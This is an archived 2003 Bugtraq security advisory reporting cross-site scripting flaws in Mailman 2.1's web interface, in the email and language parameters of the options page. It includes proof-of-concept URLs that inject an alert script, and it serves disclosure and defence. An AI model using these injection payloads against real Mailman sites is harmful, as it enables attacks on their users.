Mailman: cross-site scripting bug

From: webmaster@procheckup.com
Date: 01/24/03

  • Next message: Phrack: "Re: TRACE used to increase the dangerous of XSS."
    Date: 24 Jan 2003 14:35:07 -0000
    From: <webmaster@procheckup.com>
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Product: Mailman
    Affected Version: 2.1 not other version has been tested
    Vendor's URL: http://www.gnu.org/software/mailman/
    Solution: TBC
    Author: Manuel Rodriguez

    Introduction:
    ------------
    Mailman is software to help manage electronic mail discussion lists, much
    like Majordomo or Smartmail. And Mailman have web interface systems.

    Example:
    -----------------
    This is a simple example for version 2.1:

    1) With mailman options the email variable is vulnerable to cross-site
    scripting.

    You can recognise the vulnerabilities with this type of URL:

    https://www.yourserver.com:443/mailman/options/yourlist?
    language=en&email=&lt;SCRIPT&gt;alert('Can%20Cross%20Site%20Attack')&lt;/SCRIPT&gt;
    and that prove that any (malicious) script code is possible on web
    interface part of Mailman.

    2) The default error page mailman generates does not adequately filter its
    input making it susceptible to cross-site scripting.

    https://www.yourserver.com:443//mailman/options/yourlist?
    language=&lt;SCRIPT&gt;alert('Can%20Cross%20Site%20Attack')&lt;/SCRIPT&gt;



    Relevant Pages